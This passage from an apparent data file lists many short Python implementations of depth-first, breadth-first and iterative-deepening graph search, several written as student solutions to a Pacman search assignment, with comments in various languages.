bfs_visited(ugraph, start_node):\n visited = set([start_node])\n queue = deque([start_node])\n while queue:\n node = queue.popleft()\n for neighbor in ugraph[node]:\n if neighbor not in visited:\n visited.add(neighbor)\n queue.append(neighbor)\n return visited", "def graph_search(problem, fringe):\n counter = 0\n closed = {}\n fringe.append(Node(problem.initial))\n max_depth=0\n while fringe:\n node = fringe.pop()\n # Print some information about search progress\n if node.depth>max_depth:\n max_depth=node.depth\n if max_depth<50 or max_depth % 1000 == 0:\n pid = os.getpid()\n py = psutil.Process(pid)\n memoryUse = py.memory_info()[0]/1024/1024\n print('Reached depth',max_depth,\n 'Open len', len(fringe),\n 'Node expanse', counter,\n 'Memory used (MBytes)', memoryUse)\n\n if problem.goal_test(node.state):\n return node, counter\n serial = node.state.__str__()\n if serial not in closed:\n counter += 1\n closed[serial] = True\n fringe.extend(node.expand(problem))\n return None", "def depth_first_traversal_iterative(self, start):\n try:\n res = []\n stack = Stack([start])\n track = set()\n while stack.top:\n cur_node = stack.pop()\n if cur_node not in track:\n res.append(cur_node)\n track.add(cur_node)\n for child in reversed(self.node_dict[cur_node]):\n stack.push(child)\n except KeyError:\n raise KeyError(str(start) + ' not in graph')\n return res", "def in_order_traverse(root):\n stack = deque([root])\n visited = set()\n while stack:\n node = stack.pop()\n if node is None:\n continue\n if node.index in visited:\n print(node.index, end=' ')\n continue\n visited.add(node.index)\n stack.append(node.right)\n stack.append(node)\n stack.append(node.left)", "def bfs_iterative(graph,start):\n\tvisited = set()\n\twatched = set()\n\tnodes_queue = [start] # List that helps as queue\n\twatched.add(start)\n\t\n\twhile nodes_queue:\n\t\tcurrent_node = nodes_queue.pop(0)\n\n\t\tprint(\"visiting\",current_node)\n\t\tvisited.add(current_node)\n\t\t\n\t\tfor adjacent_node in graph[current_node]:\n\t\t\tif (adjacent_node not in watched) and (adjacent_node not in visited):\n\t\t\t\tnodes_queue.append(adjacent_node)\n\t\t\t\t#path.add(adjacent_node)", "def dft(self, starting_vertex):\n \"\"\" LIFO\n Create a stack \n Push starting Vertex\n Create a set to store visited\n While the stack is NOT empty: e.g. > 0\n Pop the last added Vertex\n Check IF NOT visited:\n Mark as visited\n\n\n Push ALL of neighbors\n \"\"\"\n s = Stack() # Create a stack\n s.push(starting_vertex) # Push starting Vertex\n visited = set() # Create a set to store visited\n\n while s.size() > 0: # While the stack is NOT empty: e.g. > 0\n v = s.pop() # Pop the last added Vertex\n\n if v not in visited: # Check IF NOT visited: e.g. 
> 0\n print(v)\n visited.add(v) # Mark as visited\n\n for n in self.get_neighbors(v): # Check IF NOT visited:\n s.push(n) # Push ALL of neighbors ", "def dft_recursive(self, starting_vertex):\n \n visited = []\n\n def helper(vert, visited):\n visited.append(vert)\n print(vert)\n\n for child in self.vertices[vert]:\n if child not in visited:\n helper(child, visited)\n\n helper(starting_vertex, visited)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n\n # Frontier stored in a Stack\n frontier = util.Stack()\n\n # Visited states stored in a list\n visitedStates = []\n\n # Format of each element: (current coordinates, [path taken to get there]) \n frontier.push((problem.getStartState(), []))\n\n # while there are still states to explore\n while not frontier.isEmpty():\n \n # store the current state and path in separate variables\n currentState, pathTaken = frontier.pop()\n\n # for skipping states that have already been visited\n if currentState in visitedStates:\n continue\n\n # for returning the correct path to the goal state upon discovering it\n if problem.isGoalState(currentState):\n return pathTaken\n\n # count the current state as \"visited\"\n visitedStates.append(currentState)\n\n # for each successor state, check whether they have already been visited. if not, add their coordinates to the frontier, and append their respective direction to the path list\n for coordinates, direction, cost in problem.getSuccessors(currentState):\n\n if coordinates not in visitedStates:\n \n frontier.push((coordinates, pathTaken + [direction]))\n\n\n util.raiseNotDefined()", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n \n util.raiseNotDefined()", "def search_loop(graph):\n visited = set()\n for vertex in graph:\n if vertex not in visited:\n if dfs(vertex, graph, visited, -1):\n return True\n return False", "def depthFirstSearch(problem):\n #Initializing variables\n fringe = util.Stack()\n #Creating visited list\n visited = []\n #Pushing start state to Stack\n fringe.push((problem.getStartState(), []))\n #Adding start state to visited list\n visited.append(problem.getStartState())\n \n #Popping point from the stack\n while fringe.isEmpty() == False:\n state, actions = fringe.pop()\n #Getting successor nodes\n for next in problem.getSuccessors(state):\n newstate = next[0]\n newdirection = next[1]\n #Pushing successor nodes to the stack and appending to visited\n if newstate not in visited:\n if problem.isGoalState(newstate):\n return actions + [newdirection] \n else:\n fringe.push((newstate, actions + [newdirection]))\n visited.append(newstate)\n\n util.raiseNotDefined()", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n # initialize frontier using initial state of problem\n current_state = problem.getStartState()\n frontier = util.Stack()\n frontier.push(current_state)\n\n # initialize explored set to be empty\n explored_set = []\n\n # a dictionary to save how to get to certain states from initial state\n actions_list = {current_state:[]}\n\n # loop while we still have unexplored nodes\n while not frontier.isEmpty():\n\n # choose a leaf node and remove it from frontier\n leaf_node = frontier.pop()\n\n # return the solution if it is the goal state\n if problem.isGoalState(leaf_node):\n return actions_list[leaf_node]\n\n # add the node to explored set\n explored_set.append(leaf_node)\n\n # expand the chosen node\n # and add to the frontier if not in frontier and explored set\n for successor in problem.getSuccessors(leaf_node):\n child, action, _ = successor\n 
if child not in explored_set and child not in frontier.list:\n frontier.push(child)\n actions_list[child] = actions_list[leaf_node] + [action]\n else:\n # search through all but still can't find a solution -> failed!\n return 'failure'", "def depth_first_search(self):\r\n queue = [self.root]\r\n ordered = []\r\n while queue:\r\n node = queue.pop()\r\n ordered.append(node)\r\n queue.extend(node.children)\r\n \r\n while ordered:\r\n yield ordered.pop()", "def find_DFS(self, value):\n \n to_visit = [self]\n \n while to_visit:\n curr = to_visit.pop() # DFS -> .pop() from end -> stack\n \n if curr.value == value:\n return curr\n \n to_visit.extend(curr.children)", "def dft_recursive(self, starting_vertex, cache = None):\n \"\"\"\n If this is the first repetition create a cache set. If the \n current vertex is not in the cache add it and print the \n vertex. For every edge the vertex has run another repetition.\n \"\"\"\n if not cache:\n cache = set()\n if starting_vertex not in cache:\n cache.add(starting_vertex)\n print(starting_vertex)\n for edge in self.get_neighbors(starting_vertex):\n if edge not in cache:\n self.dft_recursive(edge, cache)", "def dfs(visited: list, graph: AdjList, node: int):\n if node not in visited:\n visited.append(node)\n for neighbour in graph[node]:\n dfs(visited, graph, neighbour)", "def sudokuDepthFirstSearch(problem):\n\n def convertStateToHash(values):\n \"\"\" \n values as a dictionary is not hashable and hence cannot be used directly in the explored/visited set.\n This function changes values dict into a unique hashable string which can be used in the explored set.\n You may or may not use this\n \"\"\"\n l = list(sorted(values.items()))\n modl = [a+b for (a, b) in l]\n return ''.join(modl)\n\n # YOUR CODE HERE\n frontier = util.Stack()\n explored = set()\n initialState = problem.getStartState()\n frontier.push(initialState)\n while not frontier.isEmpty():\n choice = frontier.pop()\n if convertStateToHash(choice) not in explored:\n if problem.isGoalState(choice):\n return choice\n successors = problem.getSuccessors(choice)\n for successor in successors:\n frontier.push(successor[0])\n explored.add(convertStateToHash(choice))\n # util.raiseNotDefined()", "def depth_first_traversal(self, start):\n return self.recursive_dft(start, [])", "def depthFirstSearch(problem):\n marcado = set()\n pilha = util.Stack()\n pilha.push((problem.getStartState(), []))\n while not pilha.isEmpty():\n posicao, movimento = pilha.pop()\n if problem.isGoalState(posicao):\n return movimento\n if posicao in marcado:\n continue\n marcado.add(posicao)\n candidatos = problem.getSuccessors(posicao)\n for candidato, acao, custo in candidatos:\n pilha.push((candidato, movimento + [acao]))\n return []", "def dfs(self, start_node, cbfunc):\n visited = set()\n stack = [start_node]\n\n while len(stack) != 0:\n node = stack.pop()\n if node in visited:\n continue\n cbfunc(node)\n visited.add(node)\n for neighbor_node in node.each_neighbor():\n stack.append(neighbor_node)", "def depthFirstSearch(problem):\n\n\n \"*** YOUR CODE HERE ***\"\n st = util.Stack()\n strt = problem.getStartState()\n st.push(strt) \n visited = []\n came_from ={}\n came_from [strt] =(None,None)\n\n while not st.isEmpty():\n state = st.pop()\n if state in visited :\n continue\n visited.append(state)\n if problem.isGoalState(state) :\n break\n nodes = problem.getSuccessors(state)\n for (successor,action,cost) in nodes:\n if successor not in visited :\n st.push(successor)\n came_from[successor] = (state , action) \n \n # exit 
while\n actions = []\n while(state != strt) :\n (parent,action) =came_from[state]\n state = parent\n actions.append(action)\n actions.reverse()\n return actions", "def dfs(graph, root, method='dfs', max_depth=10000):\n \n # Get node object from node ID\n root = graph.getnodes(root)\n \n # Define the search method\n stack_pop = -1\n if method == 'bfs':\n stack_pop = 0\n \n visited = []\n stack = [root.nid]\n depth = 0\n \n while stack or depth == max_depth:\n node = stack.pop(stack_pop)\n \n if node not in visited:\n visited.append(node)\n stack.extend(\n [x for x in node_neighbors(graph, node) if x not in visited])\n depth += 1\n \n return visited", "def DFS(graph):\n stack = []\n actual_position = '1'\n stack.append(actual_position)\n visited_vertices = []\n\n while True:\n for neighbors in graph.values():\n try:\n neighbors.remove(actual_position) #usun sasiadow o wartosci aktualnej pozycji dla wszystich wierzcholkow grafu\n except ValueError:\n pass\n\n visited_vertices.append(actual_position) #odwiedzone wierzcholki\n\n try:\n actual_position = min(graph[actual_position]) #przejdz do sasiada o najnizszym numerze\n except ValueError:\n stack.remove(actual_position) # sciagamy ze stosu na stos\n if stack == []:\n return visited_vertices\n actual_position = stack.pop(-1) # ustaw z wierzchu stosu pozycje aktualna\n\n stack.append(actual_position) # dajemy na stos aktualna pozycje", "def breadthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n visited=[]\n \n node=dict()\n start=problem.getStartState()\n node['parent']=None\n node['direction']=None\n node['state']=start\n \n \n qu.push(node)\n lis.append(node)\n \n print qu.list\n while qu.isEmpty()!=True:\n node=qu.pop()\n pos=node['state']\n visited.append(pos)\n print visited\n if problem.isGoalState(pos):\n print \"found\"\n return getPath(problem,node)\n #break\n suc=problem.getSuccessors(pos)\n if suc ==None:\n continue \n \n print suc\n for step in suc:\n #if step not in dic :\n if step[0] not in visited:\n childnode={}\n childnode['parent']=pos\n childnode['direction']=step[1]\n childnode['state']=step[0]\n qu.push(childnode)\n lis.append(childnode)\n \n\n #util.raiseNotDefined()", "def fn(x):\n nonlocal ans \n if x < ans: \n if min(depth) == n: ans = x # all tiled\n else: \n i = min(depth)\n j = jj = depth.index(i) # (i, j)\n while jj < m and depth[jj] == depth[j]: jj += 1\n k = min(n - i, jj - j)\n for kk in reversed(range(1, k+1)): \n for jj in range(j, j+kk): depth[jj] += kk\n fn(x+1)\n for jj in range(j, j+kk): depth[jj] -= kk", "def dfs(self, starting_vertex, destination_vertex): # great for if you know the start and end, like a maze with 1 entry/1 exit\n visited = set() # create an empty 'set' to store visisted vertex, set sorts \n\n s = Stack() # create an empty Stack\n s.push([starting_vertex]) # push the starting vertex to the top of the stack \n\n while s.size() > 0: # loop if the size is greater than 0\n path = s.pop() # pop off the top element of the stack and store \n v = path[-1] # store the vertex from the end of path\n\n if v == destination_vertex: # if v is equal to the destination_vertex\n return path # return the path \n if v not in visited: # if v has not been visited yet \n visited.add(v) # add v to the vistied set \n\n for neighbor in self.vertices[v]: # loop through the neighbors\n path_copy = list(path) # make a copy of the path \n path_copy.append(neighbor) # append each neighbor to the back of the path copy \n s.push(path_copy) # push the path copy to the Stack", "def depthFirstSearch(problem):\n\n\n no 
= problem.getStartState()\n if (problem.isGoalState(no)):\n return []\n \n pilha = util.Stack()\n pilha.push((no, []))\n \n explorados = []\n \n while not pilha.isEmpty():\n (no, caminho) = pilha.pop()\n \n if problem.isGoalState(no):\n return caminho\n \n explorados.append(no)\n for filho in problem.getSuccessors(no):\n if (filho[0] not in explorados):\n pilha.push((filho[0], caminho + [filho[1]]))\n\n return []", "def depthOrBreadthFirstSearch(problem, container):\n firstNode = (problem.getStartState(), None, 0, None)#state, action to reach, incremental cost, parent node\n container.push(firstNode)\n visitedStates = []\n while (not container.isEmpty()):\n if problem.getNodesExpandedNum() > MAX_NODES_TO_EXPLORE:\n return None\n curNode = container.pop()\n if (problem.isGoalState(curNode[0])):\n return getStatePathFromNode(curNode, problem)\n for successor in problem.getSuccessors(curNode[0]):\n if not successor[0] in visitedStates:\n successorNode = (successor[0], successor[1], successor[2], curNode)\n visitedStates.append(successor[0])\n container.push(successorNode)\n return None", "def depthFirstSearch(problem):\n #print \"Start:\", problem.getStartState()\n #print \"Is the start a goal?\", problem.isGoalState(problem.getStartState())\n #print \"Start's successors:\", problem.getSuccessors(problem.getStartState())\n \n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n n = Directions.NORTH\n e = Directions.EAST\n\n #created a frontier Stack for DFS\n #Here the stack acts as a LIFO stack\n neighbourNodes = util.Stack()\n #created a list of moves which will be returned in then end\n moves = []\n #pushed the start node and empty moves list, onto the frontier stack\n neighbourNodes.push((problem.getStartState(),moves))\n #this is a set of nodes which have been seen, to avoid adding nodes already visited \n seenNodes = set()\n #condition evaluated based on the existence of elements in the frontier stack\n while not neighbourNodes.isEmpty():\n #last node in the stack is popped and its state and action is stored\n poppedNodeState, poppedNodeAction = neighbourNodes.pop()\n #condition to check if the node is already been visited\n if(poppedNodeState in seenNodes):\n #if yes then it just skips the iteration using the continue statement\n continue\n #condition to check if the current node is the goal node\n if problem.isGoalState(poppedNodeState):\n #if yes then return the action or moves to be performed list\n return poppedNodeAction\n #if not visited before then node is added to the seenNodes set\n seenNodes.add(poppedNodeState)\n #loop to parse the successor nodes and check and add them to the frontier stack\n for state, action, cost in problem.getSuccessors(poppedNodeState):\n #checking if the successor node has already been visited before\n if(state in seenNodes):\n #if yes then it skips that node\n continue\n #else it adds that successor along with it action appeneded with the already existing actions\n neighbourNodes.push((state, poppedNodeAction+[action]))\n #the list of moves if finally returned\n return moves\n #util.raiseNotDefined()", "def dft(self, starting_vertex):\n visited = set() # create an empty 'set' to store visisted vertex, set sorts \n\n s = Stack() # create an empty Stack \n s.push(starting_vertex) # push the starting_vertex to the top of the stack\n\n while s.size() > 0: # loop if the size is greater than 0\n v = s.pop() # pop off first element and store \n\n if v not in visited: # if v has not been visited yet\n visited.add(v) # add to the set \n 
print(v)\n for neighbor in self.vertices[v]: # loop through neighbors \n s.push(neighbor) # add each neighbor to the bottom of the stack", "def iterativeDeepeningSearch(problem):\n \"*** YOUR CODE HERE FOR TASK 1 ***\"\n\n # Retrieve the init state\n # state model ( (position, depth), path, cost)\n initState = ( (problem.getStartState(), 1) , ['Stop'], 0)\n limit = 1\n while True:\n # Initialization each iteration\n open = util.Stack()\n open.push(initState)\n closed = {}\n\n while not open.isEmpty():\n currState = open.pop()\n currPos = currState[0][0]\n currDepth = currState[0][1]\n currPath = currState[1]\n currCost = currState[2]\n\n closed[currPos] = currCost\n if currDepth <= limit:\n successors = problem.getSuccessors(currPos)\n if len(successors) > 0:\n nextDepth = currDepth + 1\n for each in successors:\n nextCost = currCost + each[2]\n nextPath = currPath + [each[1]]\n if each[0] not in closed.keys() or nextCost < closed[each[0]]:\n temp = ( (each[0], nextDepth), nextPath, nextCost)\n open.push(temp)\n if problem.isGoalState(temp[0][0]):\n return nextPath[1:]\n limit += 1", "def dfs(self, initialSt, goalSt): # Depth­First Search\n\n self.__reset_all_variables()\n\n start = time.perf_counter()\n\n frontier = deque() # deque will be treated as a stack\n frontier.append(initialSt)\n frontier_U_explored = set()\n frontier_U_explored.add(initialSt) # for fasten up the lookup time\n explored = set()\n\n max_frontier_size = 0\n max_ram_used = psutil.virtual_memory().used\n max_depth = initialSt.depth\n\n while len(frontier):\n currentState = frontier.pop()\n explored.add(currentState)\n frontier_U_explored.add(currentState)\n\n max_depth = currentState.depth if currentState.depth > max_depth else max_depth\n\n if goalSt == currentState:\n\n end = time.perf_counter()\n\n self.__success(initialSt,\n currentState,\n len(explored)-1,\n len(frontier),\n max_frontier_size,\n max_depth,\n end-start,\n max_ram_used,\n \"dfs\")\n return True\n\n h = currentState.children()\n h.reverse()\n for child in h:\n if child not in frontier_U_explored:\n frontier.append(child)\n frontier_U_explored.add(child)\n\n max_frontier_size = len(frontier) if len(\n frontier) > max_frontier_size else max_frontier_size\n max_ram_used = psutil.virtual_memory().used if psutil.virtual_memory(\n ).used > max_ram_used else max_ram_used\n\n return False", "def bfs(graph, i):\n visited = set()\n\n unexplored = deque()\n unexplored.append(i)\n\n while unexplored:\n curr = unexplored.popleft()\n visited.add(curr)\n edges = graph[curr]\n\n for edge in edges:\n if edge in visited:\n continue\n else:\n unexplored.appendleft(edge)\n\n return visited", "def graph_search(initial_state):\n path = [initial_state]\n current_node = copy.deepcopy(initial_state)\n while True:\n count = len(path)\n result = expand(current_node)\n for i in result:\n if i[1][1] == 0:\n path.append(i)\n break\n if len(path) > count:\n break\n else:\n current_node = result[-1]\n path.append(result[-1])\n return path", "def dfs_inorder_iter(graph, start_node):\n nonlocal t\n\n if visited[start_node]:\n return\n\n seen_once = {}\n nodes_seen = 0\n stack = [start_node]\n nodes_in_stack = set(stack)\n\n while stack:\n node = stack.pop()\n nodes_in_stack.remove(node)\n if not seen_once.get(node):\n # It's our first time visiting the node,\n # so put it back on the stack; we won't take\n # it off permanently until we're backtracking\n stack.append(node)\n nodes_in_stack.add(node)\n seen_once[node] = True\n for neighbor_node in graph[node]:\n if (not 
visited[neighbor_node]\n and not seen_once.get(neighbor_node)\n and neighbor_node not in nodes_in_stack):\n stack.append(neighbor_node)\n nodes_in_stack.add(neighbor_node)\n else:\n # We're backtracking\n visited[node] = True\n finishing_times[t] = node\n t += 1\n sccs[s] += 1", "def _explore(self, node, visited, skip_father=None):\n if node in visited:\n return\n\n visited = visited + [node]\n\n fathers_context = AbstractState()\n fathers_context.merge_fathers(node, skip_father, self)\n\n # Exclude path that dont bring further information\n if node in self.visited_all_paths:\n if self.visited_all_paths[node].does_not_bring_new_info(fathers_context):\n return\n else:\n self.visited_all_paths[node] = AbstractState()\n\n self.visited_all_paths[node].add(fathers_context)\n\n node.context[self.KEY] = fathers_context\n\n contains_call = fathers_context.analyze_node(node, self)\n node.context[self.KEY] = fathers_context\n\n sons = node.sons\n if contains_call and node.type in [NodeType.IF, NodeType.IFLOOP]:\n if _filter_if(node):\n son = sons[0]\n self._explore(son, visited, node)\n sons = sons[1:]\n else:\n son = sons[1]\n self._explore(son, visited, node)\n sons = [sons[0]]\n\n for son in sons:\n self._explore(son, visited)", "def solve(problem):\n\n # *** YOUR CODE HERE ***\n\n # The core of Iterative Deepening Search are iterations of Depth Limited\n # Search with given increasing depth.\n\n # A recursive version of Depth Limited Search\n def depth_limited_search(problem, limit):\n \"\"\"\n Return a list of nodes we traversed (or None).\n :param problem: the starting set up.\n :param limit: a given numeric depth limit.\n :return: a list of nodes.\n \"\"\"\n\n # in this case, we simply use a list to keep track of nodes we\n # traversed, instead of the data structure, Stack.\n path = list()\n visited = set() # as before, to prevent duplicated nodes\n root = problem.get_initial_state()\n\n def rec_dls(state, action, depth):\n\n visited.add(state)\n\n # if it is a goal\n if problem.goal_test(state):\n path.append((state, action))\n return path\n\n # or if it reaches a certain depth, but not a goal\n elif depth == 0:\n visited.remove(state)\n return None\n\n else:\n path.append([state, action])\n for successor, action, cost in problem.get_successors(state):\n if successor not in visited:\n # recursively expands the deepest node\n res = rec_dls(successor, action, depth-1)\n if res is not None:\n return res\n path.pop()\n visited.remove(state)\n\n # \"Stared From the Bottom\" (root)\n result = rec_dls(root, 'None', limit)\n # return the path if the we DID have achieved something\n if result is not None:\n return path\n\n import sys\n for depth in range(sys.maxsize): # depth from 0 to infinity\n print(\"Lower-bound of the optimal cost is {}\".format(depth))\n res2 = depth_limited_search(problem, depth)\n if res2 is not None:\n action_list = list()\n for move in res2:\n action_list.append(move[1]) # recall index 0 is the parent\n # do not forget a None returned in iteration 0 (with depth 0)\n action_list.remove('None')\n return action_list", "def breadthFirstSearch(problem):\r\n \"*** YOUR CODE HERE ***\"\r\n node = problem.getStartState()\r\n if (problem.isGoalState(node)):\r\n return [] # no need to make any moves of the start state is goal\r\n start = (node, 'NoDirection',0)\r\n\r\n frontier_queue = Queue() # queue for frontier\r\n frontier_queue.push(start) # frontier consists of only the start state\r\n\r\n explored_nodes = set()\r\n explored_track = {start:None} # keep a track of parent, parent 
of root node is None\r\n\r\n while not frontier_queue.isEmpty():\r\n state = frontier_queue.pop() # pop the top element from the queue \r\n explored_nodes.add(state)\r\n\r\n if problem.isGoalState(state[0]):\r\n return get_track(explored_track, state)\r\n\r\n neighbors_state = problem.getSuccessors(state[0])\r\n for neighbor in neighbors_state: # neighbor will be something like this ((34, 15), 'South', 1)\r\n if neighbor not in frontier_queue.list and neighbor not in explored_nodes:\r\n frontier_queue.push(neighbor)\r\n explored_track[neighbor] = state\r\n\r\n\r\n def get_track(explored_track, state):\r\n from game import Directions\r\n track_history = [state]\r\n track_history_direction = []\r\n leaf = state\r\n while (explored_track[leaf]) != start:\r\n track_history.append(explored_track[leaf])\r\n leaf = explored_track[leaf]\r\n\r\n for j in range (len(track_history),-1,-1):\r\n this_step = track_history[j-1]\r\n this_step = this_step[1]\r\n track_history_direction.append(this_step)\r\n return track_history_direction[:-1]", "def depthFirstSearch(problem):\n #\"*** YOUR CODE HERE ***\"\n\n \"\"\"\n Pseudocode:\n function G RAPH-S EARCH ( problem) returns a solution, or failure\n initialize the frontier using the initial state of problem\n initialize the explored set to be empty\n loop do\n if the frontier is empty then return failure\n choose a leaf node and remove it from the frontier\n if the node contains a goal state then return the corresponding solution\n add the node to the explored set\n expand the chosen node, adding the resulting nodes to the frontier\n only if not in the frontier or explored set\n\n \"\"\"\n frontier = util.Stack()\n #print 'Create frontier'\n initial_node = node(problem.getStartState(), 0, [], 0)#(state,depth,path_actions,path_cost)\n frontier.push(initial_node)\n #print 'Push ',repr(initial_node.state)\n frontierSet = set([initial_node.state])\n explored = set() #initialize the explored set to be empty\n\n while True:\n if frontier.isEmpty() == True: raise Exception, \"The frontier was emptied\"#if the frontier is empty then return failure\n currNode = frontier.pop()#HERE1\n frontierSet.remove(currNode.state)\n #print 'Remove',repr(currNode.state)\n #print 'State: ' + repr(currNode.state) + '. Depth: ' + repr(currNode.depth) + '. Path Cost: ' + repr(currNode.path_cost) + '. Path Actions: ' + repr(currNode.path_actions) + '.\\n'\n if problem.isGoalState(currNode.state) == True:\n print 'Goal reached!'\n return currNode.path_actions\n explored.add(currNode.state)\n for succ in problem.getSuccessors(currNode.state):\n #print 'Succ: ',repr(succ[0])\n succNode = node(succ[0], currNode.depth + 1, currNode.path_actions + [succ[1],], currNode.path_cost + succ[2])\n if (succNode.state not in explored):\n # Si hacemos estas verificaciones entonces cuando se encuentra que un estado que se quiere expandir ya esta en la frontera\n # eliminamos ese estado de la frontera y lo expandimos ahora. Osea, damos prioridad a los nodos nuevos\n if(succNode.state in frontierSet):\n # Recurso'i:\n for frontierNode in frontier.list:\n if frontierNode.state == succNode.state:\n frontier.list.remove(frontierNode)\n frontierSet.remove(frontierNode.state)\n # if ((succNode.state not in explored) and (succNode.state not in frontierSet)): \n # Alternativa segun el libro. 
Lo que se hace es que se da prioridad a los nodos viejos.\n\n # Aca no verificaba si ya esta en la frontera porque alteraba el orden en el que se visitan los nodos.\n # Por ejemplo cuando esta pendiente (se genero pero no se expandio) un hijo con un estado,\n # pero en un nivel mas profundo se vuelve a generar el mismo estado y se tiene que expandir.\n # Si seguimos el DFS creo que tendriamos que expandir ese nodo ahi y no en la primera llamada donde quedo pendiente.\n \n frontier.push(succNode)\n #print 'Push ',repr(succNode.state)\n frontierSet.add(succNode.state)\n\n #util.raiseNotDefined()", "def bfs_depth(g, s, discovered):\n\n level = [s]\n depth = 1\n\n while len(level) > 0:\n next_level = []\n\n for u in level:\n for e in g.incident_edges(u):\n v = e.opposite(u)\n if v not in discovered:\n discovered[v] = depth\n next_level.append(v)\n\n level = next_level\n depth += 1", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n\n #Creamos las estructuras de datos necesarias (stack y set)\n openNodes = util.Stack()\n closedNodes = set([])\n\n #Guardamos el nodo inicial\n node = Node(problem.getStartState(), '', 0, None)\n\n #Metemos el nodo en la pila\n openNodes.push(node)\n\n #Iteramos para cada nodo de la pila\n while True:\n if openNodes.isEmpty():\n break #ERROR: throw exception\n else :\n #Sacamos el nodo de arriba de la pila\n node = openNodes.pop()\n if problem.isGoalState(node.name):\n break\n else: #Expandimos los nodos sucesores del nodo n si no estan en closed\n for successor in problem.getSuccessors(node.name):\n n, p, c = successor\n succNode = Node(n, p, c, node)\n if nodeIsClosed(succNode, closedNodes) is False:\n #Metemos al sucesor en la pila\n openNodes.push(succNode)\n #Metemos el nodo n en closed\n closedNodes.add(node)\n\n #Devolvemos el camino al Goal\n return findPath(node)", "def search(board):\n depth = 0\n while True:\n result = depth_first(board, depth)\n if result:\n return result\n else:\n depth += 1", "def fn(k, i):\n ii = -1 \n for x in path:\n if gcd(nums[k], x) == 1: # coprime \n if path[x] and path[x][-1][1] > ii: \n ans[k] = path[x][-1][0]\n ii = path[x][-1][1]\n \n path.setdefault(nums[k], []).append((k, i))\n for kk in tree.get(k, []): \n if kk not in seen: \n seen.add(kk)\n fn(kk, i+1)\n path[nums[k]].pop()", "def breadth_first_graph_search(problem):\n node = Node(problem.initial)\n if problem.goal_test(node.state):\n return node\n frontier = collections.deque([node])\n explored = set()\n while frontier:\n node = frontier.popleft()\n explored.add(node.state)\n for child in node.expand(problem):\n if child.state not in explored and child not in frontier:\n if problem.goal_test(child.state):\n return child\n frontier.append(child)\n return None", "def bfs(graph,start):\n #keeps track of nodes to be visited\n queue = []\n #keeps track of nodes already visited\n explored = []\n queue.append(start)\n while queue:\n #remove first node from queue\n curr_node = queue.pop(0)\n #check if node is visited\n if curr_node not in explored:\n explored.append(curr_node)\n adjacent_nodes = graph[curr_node]\n #add adjacent nodes to queue\n for i in adjacent_nodes:\n queue.append(i)\n return explored", "def dfsIterative(m, start):\n \n s = [start] # list, use as stack\n visited = {start} # set\n out = []\n \n while len(s) > 0:\n cur = s.pop()\n pr('cur')\n out.append(cur)\n \n for vertex, connected in enumerate(m[cur]):\n # vertex is column in matrix (i)\n # connected is the True/False, 1 or 0 value\n if connected and not vertex in visited:\n 
s.append(vertex)\n visited.add(vertex)\n return out", "def recursion(adjlist, key):\n output.append(key)\n for neighbor in adjlist[key]:\n try:\n visited[neighbor]\n except KeyError:\n visited[neighbor] = True\n recursion(adjlist, neighbor)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n startState = problem.getStartState()\n visitedNodes = []\n actions = []\n fringe = util.Stack()\n cost = 0 \n if (problem.isGoalState(startState) == True):#if startState is the goalState\n return actions\n else :\n # Data Type Format : (currentState,actions,cost) based on errors I got :\\\n fringe.push((startState,actions,cost))\n while (fringe.isEmpty() == False) :\n currentState , actions , cost = fringe.pop()\n if(problem.isGoalState(currentState)):\n return actions\n \n elif ((currentState in visitedNodes) == False ):\n visitedNodes.append(currentState)\n currentNodeSuccessors = problem.getSuccessors(currentState)\n for node in currentNodeSuccessors :\n state , action , cost = node\n if ( (state in visitedNodes) == False ):\n newNode = (state , actions + [action] , cost)\n fringe.push(newNode)\n \n util.raiseNotDefined()", "def find_BFS(self, value):\n to_visit = [self]\n while to_visit:\n curr = to_visit.pop(0) # BFS -> .pop(0) -> queue \n if curr.value == value:\n return curr\n to_visit.extend(curr.children)", "def DFS(self, nDepth, treenode, state):\n \n visited = []\n visited.insert(0, (state, treenode))\n \n for index in range(0, nDepth-1): \n actions = self.priorProb(state)\n treenode.expansion(actions)\n treenode.updateU_value(actions)\n treenode, action = treenode.selection() \n state = state.do_move(action).copy()\n visited.insert(0, (state, treenode)) \n \n for index in range(0, len(visited)-1): \n if(visited[index][1].isLeaf() == True):\n value = self.leafEvaluation(visited[index][0])\n else: \n value = visited[index][1].backUp(value)\n visited[-1][1].updateQ_value(value)\n visited[-1][1].updateVisits()\n return visited[-1][1]", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n '''\n print \"Start:\", problem.getStartState()\n print \"Is the start a goal?\", problem.isGoalState((2,2))\n print \"Start's successors:\", problem.getSuccessors((1,1))\n suc=problem.getSuccessors(problem.getStartState())\n actionList=[]\n stateList=[]\n import random\n randomNum=random.randrange(0,len(suc),1)\n \n \n print len(suc)\n #for i in range(1000):\n while not problem.isGoalState(suc[randomNum][0]):\n\tprint randomNum\n\trandomNum=random.randrange(0,len(suc),1)\n\trandomAction=suc[randomNum][1]\n\t\n \t#print randomNum\n\tif suc[randomNum][0] not in stateList:\n\t\tstateList.append(suc[randomNum][0])\n\t\tactionList.append(randomAction)\n \t\tsuc=problem.getSuccessors(suc[randomNum][0]) \n \n #actionList.append(suc[randomNum][0])\n #if kiki==0:\n print actionList\n \n return actionList\n\n\n #util.raiseNotDefined()\n '''\n return DFS(problem,problem.getStartState(),[])", "def dft_recursive(self, starting_vertex, visited=None):\n # First, we set our initial condition\n if visited is None:\n # If no nodes have been visited, we create a set to store the nodes we visit\n visited = set()\n\n # Then we add the starting vertex to the visited set\n visited.add(starting_vertex)\n print(starting_vertex)\n\n # Call the function recursively on neighbors not visited\n # Lastly we write a for loop that will recursively call dft_recursive()\n for neighbor in self.vertices[starting_vertex]:\n # For each vertex, we check to see if any of the neighbors have already been visited\n if neighbor not 
in visited:\n # And if we find a neighbor that has not been visited, we recursively call dft_recursive() and pass it the neighbor and updated visited set\n self.dft_recursive(neighbor, visited)" ]
